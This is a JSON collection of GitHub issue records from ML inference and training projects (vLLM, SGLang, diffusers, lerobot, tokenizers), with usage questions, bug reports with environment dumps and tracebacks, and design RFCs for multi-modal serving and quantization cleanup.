[ { "repo": "vllm-project/vllm", "number": 31787, "title": "[Usage]: How to set different attention backend for prefill and decode phases?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Alibaba Cloud Linux 3 (Soaring Falcon) (x86_64)\nGCC version : (GCC) 10.2.1 20200825 (Alibaba 10.2.1-3.8 2.32)\nClang version : Could not collect\nCMake version : version 3.31.2\nLibc version : glibc-2.32\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.32\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 535.183.06\ncuDNN version : Probably one of the following:\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_adv.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_cnn.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_graph.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.7.1\n/usr/local/cuda/targets/x86_64-linux/lib/libcudnn_ops.so.9.7.1\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\n\u67b6\u6784\uff1a x86_64\nCPU \u8fd0\u884c\u6a21\u5f0f\uff1a 32-bit, 64-bit\n\u5b57\u8282\u5e8f\uff1a Little Endian\nCPU: 192\n\u5728\u7ebf CPU \u5217\u8868\uff1a 0-191\n\u6bcf\u4e2a\u6838\u7684\u7ebf\u7a0b\u6570\uff1a 2\n\u6bcf\u4e2a\u5ea7\u7684\u6838\u6570\uff1a 48\n\u5ea7\uff1a 2\nNUMA \u8282\u70b9\uff1a 2\n\u5382\u5546 ID\uff1a GenuineIntel\nCPU \u7cfb\u5217\uff1a 6\n\u578b\u53f7\uff1a 143\n\u578b\u53f7\u540d\u79f0\uff1a Intel(R) Xeon(R) Platinum 8469C\n\u6b65\u8fdb\uff1a 8\nCPU MHz\uff1a 3100.000\nCPU \u6700\u5927 MHz\uff1a 3800.0000\nCPU \u6700\u5c0f MHz\uff1a 800.0000\nBogoMIPS\uff1a 5200.00\n\u865a\u62df\u5316\uff1a VT-x\nL1d \u7f13\u5b58\uff1a 48K\nL1i \u7f13\u5b58\uff1a 32K\nL2 \u7f13\u5b58\uff1a 2048K\nL3 \u7f13\u5b58\uff1a 99840K\nNUMA \u8282\u70b90 CPU\uff1a 0-47,96-143\nNUMA \u8282\u70b91 CPU\uff1a 48-95,144-191\n\u6807\u8bb0\uff1a fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced 
tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.4.1\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.15.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.2.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.3\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.8.0\n[pip3] torch_memory_saver==0.0.9\n[pip3] torchao==0.9.0\n[pip3] torchaudio==2.8.0\n[pip3] torchvision==0.23.0\n[pip3] transformers==4.57.1\n[pip3] triton==3.4.0\n[conda] flashinfer-python 0.", "url": "https://github.com/vllm-project/vllm/issues/31787", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-06T07:33:18Z", "updated_at": "2026-01-06T07:33:18Z", "comments": 0, "user": "stormchasingg" }, { "repo": "sgl-project/sglang", "number": 16546, "title": "[RFC] SGLang-Omni Design", "body": "API Design: @shuaills \nProposal Draft: @FrankLeeeee @sleepcoo \n\n\n## Motivation\n\nRecent models, whether open-source or proprietary, tend to be more multi-modal than ever before. That is, a single model can process data in more than two modalities. For example, Gemini can take text, image, video, and audio as inputs and can output text, image, and audio as well. In the open-source domain, Qwen-Omni offers similar capabilities. In several public talks, researchers from major labs have said they expect omni-style models in the coming year 2026. Therefore, the SGLang team thinks it will be important to introduce new modules to accommodate these models.\n\n## Background\n\nAn omni model typically features multi-modal inputs and multi-modal outputs. An example of Qwen/Qwen2.5-Omni-7B is given below. The model can take text, audio, and video as inputs and output text and audio.\n\n\"Image\"\n\n## Design Considerations\n\n### Stage Placement\n\nCompared to an LLM, one significant characteristic of an omni-style model is that it has many more component models. For example, Qwen2.5-Omni has 6 components (2 encoders, thinker, talker, codec decoder). Thus, one particular challenge of omni models is how to place these components. Several questions arise when placing these models:\n1. In what cases do we put all components in one process?\n2. In what cases do we disaggregate the components?\n3. How do we support flexible placements?\n4. How do we support replicated placement? For example, if we want to host N instances of the talker and M instances of the thinker in a single deployment, how should we do it? (A placement sketch is given after this list.)
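\n\nTo make the placement questions concrete, here is a minimal sketch of what a flexible placement description could look like. This is a hypothetical illustration rather than the actual SGLang-Omni API; the names (`StagePlacement`, `replicas`, `gpu_ids`) are invented for this example:\n\n```python\nfrom dataclasses import dataclass\n\n@dataclass\nclass StagePlacement:\n    stage: str           # which component this stage runs, e.g. \"thinker\" or \"talker\"\n    replicas: int        # how many instances of this stage to host in one deployment\n    gpu_ids: list[int]   # GPUs exclusively owned by this stage, across all replicas\n\n# Host 2 thinkers and 1 talker, with both encoders colocated in one process.\nplacement = [\n    StagePlacement(stage=\"encoders\", replicas=1, gpu_ids=[0]),\n    StagePlacement(stage=\"thinker\", replicas=2, gpu_ids=[1, 2]),\n    StagePlacement(stage=\"talker\", replicas=1, gpu_ids=[3]),\n]\n```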
\n\n### Data Flow Control\n\nOmni models have more data flow paths than LLMs or diffusion models. For example, Qwen2.5-Omni can be used in 8 different ways. This drastically increases the complexity of system design for this kind of model, especially for scheduling.\n\n\nInputs | Outputs\n-- | --\nText | Text\nText + Vision | Text\nText + Audio | Text\nText + Vision + Audio | Text\nText | Text + Audio\nText + Vision | Text + Audio\nText + Audio | Text + Audio\nText + Vision + Audio | Text + Audio\n\n\n## Design Details\n\n\"Image\"\n\n### Intra and Inter Disaggregation\n\nWith more than one component model, an intuitive thought is to place each stage in a distinct process which exclusively owns one or more independent GPUs. However, disaggregation can also occur within a stage: for example, we might place different encoders in different processes within the encoding stage; another example is PD disaggregation in LLMs. Thus, we can simplify the design with inter- and intra-disaggregation and re-use the existing implementations of PD disaggregation in SGLang.\n- Inter-Disaggregation: We split the entire model into multiple stages, and each stage runs its own scheduling and execution logic. Tensors are communicated between stages via Mooncake or shared memory.\n- Intra-Disaggregation: The model(s) in the same stage are split into multiple processes, e.g. PD disaggregation. The implementation is not controlled by SGLang-Omni directly; the stage is only required to place its outputs into the message queue for the next stage to retrieve. In this way, developers can customize their own intra-stage disaggregation and re-use some of the existing schemes.\n\n### Multi-Scheduling\n\nEach stage can have its own scheduling strategy, e.g. continuous batching, static grouping, etc. \n\n### Multi-Path\n\nAs omni models have various data flows, we need to group them by type first:\n\n\nType | Description | Example | How to handle it?\n-- | -- | -- | --\nEarly End | The execution stops at an intermediate stage | When the qwen-omni model only outputs text, it does not need to go through the audio module. | We need to create a P2P connection from all potential ending stages to the main process so that we can pass the data directly without going through unrequired stages.\nCyclic Flow | The data might be transferred to a previous stage | VibeVoice implements a cyclic dataflow where the diffusion head's output is fed back to the LLM for the next generation step, creating a continuous loop during inference. | We can specify the previous stage as the destination in the object message queue.\nMultiple Receivers | A stage's output needs to be sent to multiple receiving stages. | Fun-Audio-Chat: During generation, the hidden states from the shared LLM layer are passed in parallel to a Text Head for text token prediction and a Speech Refined Head (SRH) to generate high-quality speech tokens at 25Hz resolution. | We can specify multiple destinations in the object message queue.
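\n\nAs an illustration of the multi-path handling above, here is a minimal sketch of a stage-output message whose destination list can express early ends, cyclic flows, and multiple receivers. The names (`StageMessage`, `route`) are hypothetical, not the actual SGLang-Omni implementation:\n\n```python\nimport queue\nfrom dataclasses import dataclass, field\n\n@dataclass\nclass StageMessage:\n    payload: object                                 # tensors/tokens produced by this stage\n    dests: list[str] = field(default_factory=list)  # next stage(s); may name a previous stage (cyclic) or \"main\" (early end)\n\ndef route(msg: StageMessage, queues: dict[str, queue.Queue]) -> None:\n    # Multiple receivers: the same payload is placed on every destination queue.\n    for dest in msg.dests:\n        queues[dest].put(msg.payload)\n\n# Early end: a text-only output skips the audio stage and goes straight to the main process.\nqueues = {\"main\": queue.Queue(), \"talker\": queue.Queue()}\nroute(StageMessage(payload=\"text tokens\", dests=[\"main\"]), queues)\n```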
\n\n## Multi-instance\n\nDue to the presence of multiple component models, it can be observed that eac", "url": "https://github.com/sgl-project/sglang/issues/16546", "state": "open", "labels": [], "created_at": "2026-01-06T06:23:37Z", "updated_at": "2026-01-06T07:14:36Z", "comments": 0, "user": "FrankLeeeee" }, { "repo": "vllm-project/vllm", "number": 31766, "title": "[Docs] Feedback for `/en/latest/contributing/profiling/`", "body": "### \ud83d\udcda The doc issue\n\nWhen I follow this doc and run the [OpenAI Server](https://docs.vllm.ai/en/latest/contributing/profiling/#openai-server) example, I get\n> usage: vllm [-h] [-v] {chat,complete,serve,bench,collect-env,run-batch} ...\n> vllm: error: unrecognized arguments: --profiler-config {\"profiler\": \"torch\", \"torch_profiler_dir\": \"/workspace/vllm_profile\"} \n\nI want to know whether this flag was added in a newer version?\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31766", "state": "open", "labels": [ "documentation" ], "created_at": "2026-01-06T03:15:37Z", "updated_at": "2026-01-06T03:15:37Z", "comments": 0, "user": "cyk2018" }, { "repo": "huggingface/tokenizers", "number": 1926, "title": "[bug] Why is development for Apple computers with Intel chips not supported in versions above 0.30.0", "body": "Why is development for Apple computers with Intel chips not supported in versions above 0.30.0?", "url": "https://github.com/huggingface/tokenizers/issues/1926", "state": "open", "labels": [], "created_at": "2026-01-06T03:11:35Z", "updated_at": "2026-01-06T03:18:03Z", "comments": 1, "user": "sustly" }, { "repo": "sgl-project/sglang", "number": 16530, "title": "[Bug] DecodingStage VRAM usage surges dramatically", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nPeak GPU memory: 21.18 GB, Remaining GPU memory at peak: 18.82 GB. Components that can stay resident: ['text_encoder', 'vae', 'transformer']\n[01-06 02:01:47] Failed to generate output for prompt 1: CUDA out of memory. Tried to allocate 1.22 GiB. GPU 0 has a total capacity of 39.49 GiB of which 371.00 MiB is free. Including non-PyTorch memory, this process has 2.92 GiB memory in use. Process 35135 has 36.14 GiB memory in use. Of the allocated memory 2.44 GiB is allocated by PyTorch, and 0 bytes is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. 
See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\nTraceback (most recent call last):\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/utils/logging_utils.py\", line 466, in log_generation_timer\n yield timer\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/entrypoints/diffusion_generator.py\", line 231, in generate\n frames = post_process_sample(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/multimodal_gen/runtime/entrypoints/utils.py\", line 73, in post_process_sample\n sample = (sample * 255).clamp(0, 255).to(torch.uint8)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\ntorch.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.22 GiB. GPU 0 has a total capacity of 39.49 GiB of which 371.00 MiB is free. Including non-PyTorch memory, this process has 2.92 GiB memory in use. Process 35135 has 36.14 GiB memory in use. Of the allocated memory 2.44 GiB is allocated by PyTorch, and 0 bytes is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n[01-06 02:01:47] Completed batch processing. Generated 0 outputs in 375.74 seconds.\n[01-06 02:01:47] Generator was garbage collected without being shut down. Attempting to shut down the local server and client.\n/usr/lib/python3.12/multiprocessing/resource_tracker.py:254: UserWarning: resource_tracker: There appear to be 1 leaked semaphore objects to clean up at shutdown\n\n\n### Reproduction\n\nsglang generate --model-path /data/models/Wan2.2-TI2V-5B-Diffusers --text-encoder-precisions bf16 --dit-precision bf16 --vae-precision fp32 --dit-cpu-offload --vae-cpu-offload --text-encoder-cpu-offload --image-encoder-cpu-offload --pin-cpu-memory --num-gpus 1 --prompt \"Two anthropomorphic cats in comfy boxing gear and bright gloves fight intensely on a spotlighted stage.\" --num-frames 121 --fps 24 --num-inference-steps 50 --save-output --output-path output --output-file-name wan_ti2v.mp4 --dit-layerwise-offload\n\n### Environment\n\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0,1,2,3: NVIDIA A100-PCIE-40GB\nGPU 0,1,2,3 Compute Capability: 8.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 590.44.01\nPyTorch: 2.9.1+cu129\nsglang: 0.5.7\nsgl_kernel: 0.3.20\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: 0.5.3+cu129\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.4.0\naiohttp: 3.13.2\nfastapi: 0.128.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.2.1\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n\tGPU0\tGPU1\tGPU2\tGPU3\tNIC0\tNIC1\tNIC2\tNIC3\tNIC4\tNIC5\tNIC6\tNIC7\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\nGPU0\t X \tPIX\tSYS\tSYS\tNODE\tNODE\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t0-27,56-83\t0\t\tN/A\nGPU1\tPIX\t X \tSYS\tSYS\tNODE\tNODE\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t0-27,56-83\t0\t\tN/A\nGPU2\tSYS\tSYS\t X \tPIX\tSYS\tSYS\tSYS\tSYS\tPIX\tPIX\tNODE\tNODE\t28-55,84-111\t1\t\tN/A\nGPU3\tSYS\tSYS\tPIX\t 
X \tSYS\tSYS\tSYS\tSYS\tPIX\tPIX\tNODE\tNODE\t28-55,84-111\t1\t\tN/A\nNIC0\tNODE\tNODE\tSYS\tSYS\t X \tPIX\tNODE\tNODE\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC1\tNODE\tNODE\tSYS\tSYS\tPIX\t X \tNODE\tNODE\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC2\tPIX\tPIX\tSYS\tSYS\tNODE\tNODE\t X \tPIX\tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC3\tPIX\tPIX\tSYS\tSYS\tNODE\tNODE\tPIX\t X \tSYS\tSYS\tSYS\tSYS\t\t\t\t\nNIC4\tSYS\tSYS\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t X \tPIX\tNODE\tNODE\t\t\t\t\nNIC5\tSYS\tSYS\tPIX\tPIX\tSYS\tSYS\tSYS\tSYS\t", "url": "https://github.com/sgl-project/sglang/issues/16530", "state": "open", "labels": [], "created_at": "2026-01-06T02:15:16Z", "updated_at": "2026-01-06T02:15:16Z", "comments": 0, "user": "carloszhang999" }, { "repo": "huggingface/lerobot", "number": 2753, "title": "Debugging poor eval with SmolVLA and two cameras.", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n- Lerobot running on a Jetson Orin Nano Super\n- Model trained on a 4090\n- SO-ARM-101 model.\n- two-camera setup (wrist and top view)\n```\n\n### Description\n\nI just trained a 30K-step SmolVLA model on a 73-episode dataset (two datasets I had, merged together). Both datasets were recorded with the same SO-ARM-101 using two cameras (wrist and top).\nI downloaded the model from HF and, after a couple of hiccups because of the missing third camera, got it running on my Jetson Orin Nano Super (the machine I'm using for the robot; training is on my 4090).\nBut the arm just moved a centimeter and then stayed idle.\n\nI'm trying to debug what could have caused this:\nIs it because I'm running on my Jetson and SmolVLA is too much for this little board? (I don't think so, but maybe?)\nDid merging the datasets create more noise than it helped? (The datasets were recorded at different times of the day.)\nCould the fact that I only have two cameras, and had to remap the cameras and create a dummy third camera for the third camera parameter, have confused the model?\n\nDoes anyone have any insight? 
Thanks in advance!\n\n### Context & Reproduction\n\ncollected datasets (two datasets)\nmerged datasets into one and uploaded to HF\ntrained a model based on smovla-base (had to create a dummy camera for the third camera)\nrun on the jetson orin the trained model.\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2753", "state": "open", "labels": [ "question", "policies", "dataset", "sensors", "training", "evaluation" ], "created_at": "2026-01-05T18:25:13Z", "updated_at": "2026-01-05T18:25:27Z", "user": "vettorazi" }, { "repo": "vllm-project/vllm", "number": 31726, "title": "[Usage]: Why does `vllm serve` keep filling up my system disk when loading a model from a network mount?", "body": "\n### Your current environment\n```\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.10 (main, Oct 3 2024, 07:29:13) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.10.134-18.0.5.lifsea8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.4.131\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 560.35.03\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.9.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8469C\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand 
hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ibrs_enhanced fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 wbnoinvd ida arat hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk amx_bf16 avx512_fp16 amx_tile amx_int8 arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 195 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-95\nNUMA node1 CPU(s): 96-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] botorch==0.8.5\n[pip3] flashinfer-py", "url": "https://github.com/vllm-project/vllm/issues/31726", "state": "open", "labels": [ "usage" ], "created_at": "2026-01-05T14:50:19Z", "updated_at": "2026-01-05T15:30:39Z", "comments": 5, "user": "tingjun-cs" }, { "repo": "huggingface/diffusers", "number": 12913, "title": "Is Lumina2Pipeline's mu calculation correct?", "body": "### Describe the bug\n\nDescription\n\nWhile reviewing the current main-branch implementation of pipeline_lumina2, I noticed a potential bug in the calculation of mu within the pipeline's __call__.\n\nIn the following section of the code:\n\nhttps://github.com/huggingface/diffusers/blob/5ffb65803d0ddc5e3298c35df638ceed5e580922/src/diffusers/pipelines/lumina2/pipeline_lumina2.py#L484-L503\n\nThe latent tensor appears to have the shape:\n\n(batch_size, num_channels_latents, height, width)\n\n\nHowever, later in the same file:\n\nhttps://github.com/huggingface/diffusers/blob/5ffb65803d0ddc5e3298c35df638ceed5e580922/src/diffusers/pipelines/lumina2/pipeline_lumina2.py#L699-L706\n\nthe value latent.shape[1] (i.e., num_channels_latents) is passed as the argument for image_seq_len when computing mu.\nThis seems incorrect, since image_seq_len should represent the number of image tokens or sequence length, not the number of latent channels.\n\nExpected Behavior\n\nimage_seq_len should likely correspond to the number of spatial tokens derived from (height, width) (or another tokenization step), rather than the number of latent channels.\n\nActual Behavior\n\nThe current implementation uses latent.shape[1] as image_seq_len, which likely leads to unintended behavior in the computation of mu and subsequent sampling steps.\n\nSuggested Fix\n\nReview the logic where image_seq_len is passed, and ensure it reflects the correct sequence length dimension (possibly derived from spatial resolution or token count, rather than channel count).\n\n### Reproduction\n\nAt the moment, I don\u2019t have 
a copy/paste runnable MRE because this was identified via manual logic review rather than by reproducing the behavior in a runtime environment.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nDiffusers==0.36.0\nPython==3.13\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12913", "state": "open", "labels": [ "bug" ], "created_at": "2026-01-05T14:30:01Z", "updated_at": "2026-01-05T18:07:36Z", "comments": 1, "user": "hwangdonghyun" }, { "repo": "vllm-project/vllm", "number": 31689, "title": "[Feature][Quantization][Help Wanted]: Clean up GPTQ + AWQ Quantization", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe are in the process of cleaning up the quantization integrations in vllm (see the FusedMoE refactor PRs I am working on).\n\nIn general, this means we are trying to separate the concerns of the quantization INTEGRATION (on-disk format --- responsible for weight loading) from the quantization KERNEL (runtime format --- responsible for executing at runtime).\n\nFor GPTQ/AWQ, we have tech debt in that we have different quantization integrations (`gptq.py`, `gptq_marlin.py`, `awq.py`, `awq_marlin.py`, `wna16.py`, `cpuwna16.py`) and we use `override_quantization_method` to select between them during initialization. This is generally hard to follow and does not adhere to the abstractions we have in vllm.\n\nCurrently, some (but not all) quantization schemes follow the proper abstractions, where we have a full separation of concerns. Examples are:\n- [Fp8Moe](https://github.com/vllm-project/vllm/blob/b53b89fdb3f4a857eabee5091187cfa937502711/vllm/model_executor/layers/quantization/fp8.py#L722) which follows the proper structure to run a variety of different kernels hooked up to fp8 models\n- [CompressedTensorsWNA16](https://github.com/vllm-project/vllm/blob/b53b89fdb3f4a857eabee5091187cfa937502711/vllm/model_executor/layers/quantization/compressed_tensors/schemes/compressed_tensors_wNa16.py) which follows the proper structure to run a variety of different kernels hooked up to wna16 models\n\nWe need to apply this to gptq and awq.\n\n> WARNING: this is a significant undertaking and will be scrutinized heavily for code quality. The PR author should reach out to @robertgshaw2-redhat in slack to discuss design and on-going progress during the PR creation.\n\nThanks in advance for any help!!!\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31689", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2026-01-04T20:56:04Z", "updated_at": "2026-01-06T04:42:19Z", "comments": 7, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31683, "title": "[Feature]: Error Logging Redesign", "body": "### \ud83d\ude80 The 